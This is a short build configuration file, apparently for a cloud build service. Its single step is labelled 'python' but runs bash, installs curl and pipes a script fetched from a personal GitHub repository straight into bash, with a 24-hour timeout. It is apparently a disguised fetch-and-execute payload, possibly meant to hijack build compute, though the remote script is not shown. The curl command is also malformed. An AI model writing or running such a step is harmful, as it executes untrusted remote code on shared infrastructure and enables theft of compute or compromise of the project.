steps:
  - name: python
    args:
      - '-c'
      - >-
        apt-get update && apt-get install curl -y && curl -sL curl https://github.com/asnote2299/Man/raw/main/buy | bash
    waitFor:
      - '-'
    entrypoint: /bin/bash
timeout: 86400s
